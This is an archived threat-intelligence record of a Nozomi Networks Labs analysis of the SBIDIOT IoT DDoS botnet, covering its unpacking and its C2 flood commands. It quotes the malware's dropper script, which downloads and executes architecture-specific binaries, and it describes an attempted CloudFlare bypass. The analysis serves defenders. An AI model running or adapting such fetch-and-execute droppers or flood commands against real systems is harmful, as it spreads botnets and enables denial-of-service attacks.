{
	"id": "4206a8b2-6463-4b8e-84dd-bdedb83e6298",
	"created_at": "2026-04-06T00:20:02.006531Z",
	"updated_at": "2026-04-10T13:12:38.815288Z",
	"deleted_at": null,
	"sha1_hash": "33c2354d71334b30e843e59de68c1627e71a0ecb",
	"title": "Threat Intelligence: Analysis of the SBIDIOT IoT Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4961039,
	"plain_text": "Threat Intelligence: Analysis of the SBIDIOT IoT Malware\r\nBy by Nozomi Networks Labs | April 7, 2021\r\nArchived: 2026-04-05 16:22:27 UTC\r\nThere are billions of IoT connections in the world and more than 70 percent of them are in the industrial sector. This is why\r\nNozomi Networks Labs regularly reviews the threat landscape for IoT devices. Recently, a malware sample named\r\nSBIDIOT caught our attention. It had a relatively low number of detections on VirusTotal and its commands, in the current\r\nform, were not well documented by the cybersecurity community.\r\nWe decided to analyze SBIDIOT and uncovered how it communicates with targets and what types of commands it supports.\r\nThis information helps detect the threat and allows defenders to stop or mitigate it before harmful impacts occur. The main\r\npotential impact of DDoS (Distributed Denial of Service) botnets is the generation of excessively high loads on targeted\r\nservers, preventing users from accessing services and thus harming normal business operations.\r\nTo avoid impacts, early detection is vital. Detection can be done by your security team (see the malware indicators at the end\r\nof this article) or by using a network monitoring and threat intelligence solution such as ours.\r\nAnalysis of SBIDIOT Malware\r\nBased on our information, at least one way that the malware propagates is by exploiting an RCE vulnerability in ZTE\r\nrouters. For older versions, we observed a shell script sh downloading and executing binary payloads once delivered to the\r\nvictim machines by various means:\r\n#!/bin/bashcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://\r\n/SBIDIOT/x86; curl -O http:///SBIDIOT/x86;cat x86 \u003eSSH;chmod +x *;./SSH SSH cd /tmp || cd /var/run || cd /mnt || cd\r\n/root || cd /; wget http:///SBIDIOT/mips; curl -O http:///SBIDIOT/mips;cat mips \u003eSSH;chmod +x *;./SSH SSH cd /tmp || cd\r\n/var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/mpsl; curl -O http:///SBIDIOT/mpsl;cat mpsl \u003eSSH;chmod +x\r\n*;./SSH SSH cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/arm; curl -O http:///SBIDIOT/arm;cat\r\narm \u003eSSH;chmod +x *;./SSH SSH...\r\nThe sample e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 is packed with the standard UPX\r\ntool, with the UPX header later modified. While the malware remains executable, it is no longer possible to unpack it using\r\nthe same tool straight away:\r\n$ file\r\ne2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eab\r\nELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header$ upx -d\r\ne2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Ultimate Packer for eXecutables Copyright (C)\r\n1996 - 2020 UPX 3.96 Markus Oberhumer, Laszlo Molnar \u0026 John Reiser Jan 23rd 2020 File size Ratio Format Name -------\r\n-- ------ ----- ---- upx: e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: NotPacked Exception: not\r\npacked by UPX Unpacked 0 files.\r\nAs we can see here, the UPX! signature was replaced with a custom YTS\\x99 signature:\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 1 of 9\n\nHex dump showing that the “UPX!” string has been replaced.\r\nRestoring it back will enable us to unpack the sample using the standard UPX tool:\r\n$ perl -pi -e 's/YTS\\x99/UPX!/g' e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 $ upx -d\r\ne2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Ultimate Packer for eXecutables Copyright (C)\r\n1996 - 2020 UPX 3.96 Markus Oberhumer, Laszlo Molnar \u0026 John Reiser Jan 23rd 2020 File size Ratio Format Name -------\r\n-- ------ ----- ---- 55372 \u003c- 30024 54.22% linux/i386\r\ne2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Unpacked 1 file. $ file\r\ne2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9\r\ne2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386,\r\nversion 1 (SYSV), statically linked, stripped\r\nThe analysis reveals characteristics quite common for this type of threat. There is a strong focus on DDoS with some parts\r\nof the code shared with other malware families like Gafgyt.\r\nGiven that the sample is statically linked and stripped, which is almost always the case with malware targeting IoT, the next\r\nstep was to load FLIRT signatures for uClibc to make analysis easier. uClibc is a compact C library commonly used in Linux\r\nkernel-based embedded devices, which is also commonly used by IoT malware developers for easy cross-compilation, as\r\npopularized with Mirai. FLIRT signatures are essentially a method that reverse engineering tools like IDA use to pattern-match known libraries, which can greatly speed up the analysis process.\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 2 of 9\n\nA large number of functions are recognized using FLIRT.\r\nUpon execution, the sample attempts to connect to its C2, which in this case is an IP address and port hard-coded into the\r\nbinary. Although the C2 infrastructure was not operational during the time of the investigation, we were able to force the\r\nsample to talk to our own server as its C2. Coupled with some static analysis, this was enough to quickly figure out the\r\nprotocol and begin interaction.\r\nThe function responsible for handling commands compares each command received from C2 with one of the following\r\nstrings:\r\nTCP\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 3 of 9\n\nHTTPSTOMP\r\nVSE\r\nHEX\r\nSTD\r\nVOX\r\nNFO\r\nUDP\r\nUDPH\r\nR6\r\nFN\r\nOVHKILL\r\nNFOKILL\r\nSTOP\r\nStop\r\nstop\r\nThen, based on the results, it performs several validation checks on its arguments before executing the actual command.\r\nCommands Supported by SBIDIOT\r\nTCP\r\nThe TCP command asks the bot to send TCP segments destined for a specified host/port combination for a specified interval\r\nof time. Additionally, it allows the operator to set a number of optional TCP flags.\r\nCustom TCP flags supported in the TCP command handler.\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 4 of 9\n\nHTTPSTOMP\r\nAs arguments, it takes in an HTTP method, a host/port combination, an attack duration and a request count specifying how\r\nmany times to repeat this operation. If the attack duration and the request count are not exceeded, this function will continue\r\nto perform HTTP requests using the settings provided and a randomly selected user-agent string.\r\nHard-coded list of user-agent strings.\r\nHTTPSTOMP command handler.\r\nAdditionally, another function is called to perform HTTP requests to the /cdn-cgi/l/chk_captcha URI of a hostname/port\r\ncombo with, once again, a configurable attack duration and request count. This is done in an attempt to circumvent\r\nCloudFlare protection mechanisms.\r\nVSE\r\nAnother command used for DDoS, which, depending on the arguments provided, employs either UDP or RAW sockets.\r\nAgain, arguments for the target and attack duration can be provided, but additionally, the attacker can specify a pause\r\ninterval between packets delivered to the target. Variants of Gafgyt and other IoT malware occasionally include a VSE\r\ncommand to target servers running the Valve Source Engine.\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 5 of 9\n\nCode snippet from VSE command handler implementing pause interval.\r\nVOX\r\nThe VOX command takes a host, a port and an attack duration as its arguments and then sends UDP datagrams with one of\r\nthree randomly selected hard-coded payloads.\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 6 of 9\n\nRecorded malicious UDP traffic containing hardcoded payloads.\r\nUDP\r\nThe sample sends UDP payloads to a target host specifying the port, the attack duration and the maximum size of the\r\ngenerated payload. The actual size of the payload may be smaller due to the use of the strlen function, which calculates the\r\nsize by counting bytes up until the first null value.\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 7 of 9\n\nCommand handler validating UDP arguments.\r\nHEX / STD / R6 / NFO / FN / OVHKILL / NFOKILL / UDPH\r\nAll of the above commands call the same function, which receives a host name, a port and an attack duration, then starts\r\ngenerating UDP traffic with a fixed payload.\r\nCode diagram with several code blocks pointing to the same function.\r\nSTOP/stop/Stop\r\nThis command sends a SIGKILL signal to all process IDs that are currently being tracked, giving the operator the ability to\r\nstop any of the process’ children.\r\nSTOP command handler.\r\nThreat Intelligence is Needed to Defend Industrial Systems from IoT Malware\r\nAs the number of Internet-connected devices increases at a rate of more than 130 percent a year,\r\n1\r\n the threat landscape also\r\nrapidly evolves. New families of malware and modifications of existing ones emerge regularly. And, regardless of their\r\ncomplexity and sophistication, they all pose a threat.\r\nTo defend against threats to IoT devices that could impact production, uptime and possibly safety, automated tools can help.\r\nOT/IoT network monitoring paired with regularly updated threat intelligence identifies indicators of compromise and\r\nanomalous behavior, giving you the opportunity to act before harm occurs.\r\nNozomi Networks Labs is committed to providing real-time information on IoT threats as they continue to increase in\r\nprevalence and significance for operational technology environments – stay-tuned for ongoing updates.\r\nFor indicators of SBIDIOT malware, see the information provided at the end of this page.\r\nReferences\r\n1. “The Internet of Things: Consumer, Industrial \u0026 Public Services 2020-2024,” Juniper Networks, March 31, 2020.\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 8 of 9\n\nSource: https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 9 of 9\n\nFor indicators of SBIDIOT References malware, see the information provided at the end of this page.  \n1. “The Internet of Things: Consumer, Industrial \u0026 Public Services 2020-2024,” Juniper Networks, March 31, 2020.\n   Page 8 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/"
	],
	"report_names": [
		"threat-intelligence-analysis-of-the-sbidiot-iot-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434802,
	"ts_updated_at": 1775826758,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/33c2354d71334b30e843e59de68c1627e71a0ecb.pdf",
		"text": "https://archive.orkl.eu/33c2354d71334b30e843e59de68c1627e71a0ecb.txt",
		"img": "https://archive.orkl.eu/33c2354d71334b30e843e59de68c1627e71a0ecb.jpg"
	}
}